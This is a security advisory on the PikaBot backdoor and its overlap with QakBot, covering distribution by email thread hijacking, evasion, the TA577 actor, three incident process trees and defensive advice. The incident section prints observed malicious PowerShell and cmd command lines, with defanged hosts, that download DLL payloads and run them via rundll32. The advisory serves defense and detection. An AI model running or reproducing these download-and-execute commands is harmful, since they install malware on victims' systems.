Key Points
- PikaBot is an emerging malicious backdoor compromising systems since early 2023 by providing access to other attackers for ransomware, crypto-mining, data theft and remote control.
- Its distribution methods include phishing via email thread hijacking that incorporate ZIP attachments which contain embedded JS files that fetch the PikaBot malware.
- Prioritizes defense evasion with anti-debugging and anti-VM measures.
- Employs a proprietary C2 framework supporting various commands.
- Notable parallels between PikaBot and the dismantled QakBot trojan such as email threat hijacking, unique URL patterns, nearly identical infection chain, and loader capabilities.
- TA577, a financially motivated access broker, historically associated with QakBot distribution is being observed distributing PikaBot.
- OBRELA identified a new QakBot-PikaBot overlapping technique in which randomly named folders are created, DLL files are fetched disguised as another extension and storing and running them with the .OOOOOCCCCCXXXXX extension.
- Regular software updates, reliable security tools, caution with online content and downloads, robust passwords, MFA and email thread hijacking awareness can protect from such threats.
Overview
In a comprehensive exploration of the PikaBot malware, this advisory delves into the insidious capabilities and techniques employed by this emerging malicious backdoor. Since its onset in early 2023, PikaBot has posed a significant threat by providing unauthorized remote access to compromised systems. This article elucidates the multifaceted nature of PikaBot’s operations, from its distribution methods to the execution of malicious activities. As the intricacies of PikaBot’s functionalities are dissected, attention is drawn to its parallelism with the dismantled QakBot trojan, shedding light on the evolving landscape of cyber threats. Additionally, the advisory provides valuable insights into the historical context of QakBot and its connection to the cybercriminal group TA577, OBRELA’S findings regarding new overlapping techniques of QakBot and PikaBot and offering recommendations to fortify digital security against such potent threats.
PikaBot Capabilities
PikaBot, an emerging malicious backdoor, has been actively compromising systems since early 2023, providing unauthorized remote access to the attackers. This insidious threat is equipped to receive commands from a command-and-control server, allowing for the injection of arbitrary shellcode, DLLs, or executable files. Notably, PikaBot employs robust anti-vm and anti-debug techniques. Its malicious capabilities extend to distributing CobaltStrike, ransomware, and various other types of malicious software. Comprising a loader and a core module, the latter executes the majority of the malware’s functions, while the former facilitates these malicious activities.
In terms of initial access, PikaBot distributors employ email thread hijacking, intercepting legitimate email conversations to insert malicious attachments or URLs. The recent PikaBot & Darkgate campaign, reported by Cofense, starting from October 2023, exploited the Microsoft Exchange Server vulnerability ProxyLogon CVE-2021-26855. This allowed threat actors to bypass authentication, impersonate admins, and hijack existing email threads. Email thread hijacking proves highly effective, as users are often not warned that a phishing email may originate from within existing threats.
For execution, victims are enticed to open ZIP attachments or download and open them via embedded URLs, which have additional layers restricting access to the malicious payload based on specific threat actor-defined requirements (i.e. location specific-excluding infecting machines in Commonwealth of Independent States which were members of the former Soviet Union and internet browser specific). The ZIP archive contains JS files, leveraging JavaScript applications to connect to another URL and download and run PikaBot or DarkGate malware.
PikaBot prioritizes defense evasion, incorporating sophisticated anti-debugging and anti-VM measures inspired by the Al-Khaser project. The loader component runs anti-analysis tests, employing steganography to conceal its payload. In case of test failure, Pikabot aborts execution, thwarting research analysis. Its anti-analysis techniques include checking for debuggers, breakpoints, and system information, utilizing tools like ADVobfuscator for string obfuscation, and employing methods to detect sandbox environments and analysis attempts.
In terms of command and control (C2), PikaBot employs a proprietary C2 framework, supporting a variety of commands for host enumeration and advanced secondary payload injection. These commands range from running shell commands to fetching and executing EXE or DLL files, altering the C2 check-in interval, and even a “destroy” command.
PikaBot’s objectives pose extreme dangers, including crypto-mining on compromised systems, installing spyware and ransomware, stealing credentials and confidential data, and enabling remote hands-on control.
Threat Related Context
Remarkably intriguing is the parallelism between Pikabot and the recently dismantled QakBot trojan, encompassing distribution methods, campaigns, and malware behaviors. Despite the FBI’s announcement on August 29 about the disruption of the QakBot botnet infrastructure through international law enforcement coordination, the relentless nature of cybersecurity ensures that new threats emerge to fill the void left by dismantled networks.
Cofense brought attention to a fresh malware phishing campaign disseminating DarkGate and PikaBot, as mentioned earlier. Although there is no conclusive evidence linking DarkGate and PikaBot to QakBot, the cybersecurity community notes substantial similarities. Furthermore, PikaBot surfaced just as QakBot activity ceased, suggesting a potential connection. In a mimicry of QakBot’s tactics, the perpetrators behind this campaign employ identical techniques, indicating either the involvement of cybercriminals affiliated with QakBot or the inspiration of another group or groups by the recently dismantled criminal network.
The shared techniques between QakBot and PikaBot include:
- Leveraging hijacked email threats for initial access, a distinctive signature of QakBot.
- Employing URLs with unique patterns, restricting victim access based on previously mentioned criteria, echoing a key element of QakBot.
- Demonstrating a nearly identical infection chain.
- Utilizing loaders, software responsible for dropping the actual malicious software onto the system.
Historically, the cybercriminal group TA577, also known as Storm-0464, DEV-0464, Hive0118, and TR, has been observed distributing QakBot. This prolific financially motivated access broker is notorious for disseminating QakBot and facilitating access for hands-on-keyboard ransomware operators like Storm-0506, Storm-0216, and Storm-0826, who deploy the Black Basta ransomware. Storm-0464 has also distributed other malware, such as SquirrelWaffle and recently PikaBot. While the group’s geographical origin remains unconfirmed, it has targeted a diverse range of industries and regions, exploiting vulnerabilities like the Microsoft Support Diagnostic Tool (CVE-2022-30190), ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065), and ProxyShell (CVE-2021-31207, CVE-2021-34473, and CVE-2021-34523) as part of its operations.
Newly Observed Campaign TTPs
In the past OBRELA SOC teams have also identified overlapping Tactics, Techniques and Procedures (TTPs) of QakBot and PikaBot. For example:
1.Incident QakBot – March 2023:
In this detected incident the initial access vector was a hijacked email thread in which the threat actor attached a password-protected ZIP file that upon the victim opened it and clicked the embedded JS file, the following process tree was identified:
- Wscript runs the suspicious JS file.
- The previous Wscript process spawned an obfuscated PowerShell command line that upon decoding it, it included further defense evasion actions and the subsequent command line:
- ***REDACTED***;Invoke-WebRequest http://{Malicious_IP}/o3YhXn/000 -O $env:TEMP\elytroidDeedily.dll; rundll32 $env:TEMP\\elytroidDeedily.dll,XL55;
This command fetches a DLL file from a remote server, stores it in the Temp folder and then runs it via Rundll32.
2. Incident PikaBot – October 2023:
In this detected incident the victim opened a served ZIP file and clicked the embedded JS file. The following process tree was identified:
- Wscript runs the suspicious JS file.
- The previous Wscript process spawned an the following CMD command line:
- cmd.exe” /c pjTG || eCho pjTG & pIng pjTG || Curl http[:]//{Malicious_IP}/PmpZ/Hamma -o %TMP%\pjTG.dll & pIng -n 3 pjTG || RUnDLL32 %Tmp%\pjTG.dll, CrashForException_ExportThunk & exIT y=dMgDFUHrFAyP
This command, beside other actions that it performs, also fetches a DLL file from a remote server, stores it in the Temp directory and then executes it via rundll32.
By comparing these 2 incidents, we can also confirm the assumptions of technique overlapping between QakBot and PikaBot, since they both utilize a ZIP file that contain embedded JS files that upon executing, they spawn CMD/PowerShell processes to fetch a DLL file, store it in the Temp directory and then execute it via rundll32.
In addition, Obrela has identified also another technique overlap between the two malwares by detecting a recent PikaBot incident:
3. 2nd Incident PikaBot – December 2023:
In this newly detected incident, the initial access vector was a hijacked email thread in which the threat actor included a malicious URL. Upon gaining trust, the victim clicked on the link, downloaded, and opened a suspicious ZIP file and clicked the embedded JS file. The following process tree was identified:
- Wscript runs the suspicious JS file
- The previous Wscript process spawned multiple such cmd.exe instances:
- cmd.exe” /c mkdir C:\Jildlfgkks\Rgdbthdnser & curl hxxps[://]{malicious_domain}/iknXn/0[.]05901240746824343[.]dat –output C:\Jildlfgkks\Rgdbthdnser\Jrhrsrhdfrhse.OOOOOCCCCCXXXXX
- cmd.exe” /c timeout 10 & rundll32 C:\Jildlfgkks\Rgdbthdnser\Jrhrsrhdfrhse.OOOOOCCCCCXXXXX,Enter
In this incident, the initial access vector is the same as for both QakBot & PikaBot (hijacked email threads), delivering a malicious ZIP file that includes JS files that fetch a file from a remote server and then execute it via Rundll32.
However, in this incident the following points were substantially different from previous encounters, indicating the usage of more sophisticated means of obfuscation:
- No Temp directory used. Instead, a new (possibly random name generated) folder is created.
- The DLL file is now disguised as a DAT file in the requested URL.
- The requested DLL is now stored in the newly created folder with a strange .OOOOOCCCCCXXXXX extension.
In the past, QakBot has also been observed performing similar techniques:
- Creating similar folders: i.e.: C:\Nychtria\Byfosrta
- Fetching a DLL file disguised as a PNG file in the requested URL: https://{{malicious_domain}}/0f6eAzyWLUL/Lkmn.png
- The requested DLL file is stored in the newly created folder C:\Nychtria\Byfosrta with this name and extension: Nyfense.OOOOOCCCCCXXXXX
Thus, we can also observe here a new overlap in the TTPs of the 2 malwares.
Recommendations to Stay Protected
- Ensure that your software is consistently updated, encompassing your operating system, web browser, and other applications. Regular software updates not only enhance performance but also address security vulnerabilities, safeguarding your system against potential exploits by malware and malicious actors.
- Safeguard your systems by installing reliable antivirus software, Endpoint Detection & Response (EDR), and Security Email Gateway (SEG). These essential programs play a crucial role in preventing malware from infiltrating your network.
- Exercise caution when interacting with online content; refrain from clicking on links in emails or on unfamiliar websites. Unverified links may redirect you to compromised websites that harbor malicious software.
- Exercise prudence when downloading files; restrict downloads to reputable and trusted websites. Ensure that the source is reliable and known to minimize the risk of downloading potentially harmful files.
- Bolster your digital security by creating robust passwords and implementing Multi-Factor Authentication (MFA). Craft passwords with a minimum length of 8 characters, incorporating a combination of uppercase and lowercase letters, numbers, and symbols. Utilize distinct passwords for various accounts and enable MFA to fortify defenses against unauthorized access.
- Stay vigilant against email thread hijacking in the realm of phishing attacks. Recognize that phishing attempts can originate from both unfamiliar and familiar contacts. When navigating email threats, verify the identity of the sender to thwart potential security breaches.
Credits
Credits to the Detection Engineering, SOC, and CTI teams of OBRELA Security Industries SA.
References
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot
- https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot
- https://news.sophos.com/en-us/2023/06/12/deep-dive-into-the-pikabot-cyber-threat/
- https://medium.com/@DCSO_CyTec/shortandmalicious-pikabot-and-the-matanbuchus-connection-5e302644398
- https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855
- https://portal-digitalshadows.com/intelligence/actors/240719/in-depth
- https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#Qakbot
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware
- https://techcommunity.microsoft.com/t5/microsoft-defender-xdr-blog/monthly-news-october-2023/ba-p/3943236
- https://www.bleepingcomputer.com/news/security/darkgate-and-pikabot-malware-emerge-as-qakbots-successors/
- https://gridinsoft.com/blogs/darkgate-pikabot-qakbot/
- https://thehackernews.com/2023/11/darkgate-and-pikabot-malware-resurrect.html
- https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_AA_10.05.2022.txt
- https://twitter.com/pr0xylife/status/1524077656551088128
- https://www.socinvestigation.com/qbot-returns-returns-with-new-ttps-detection-response/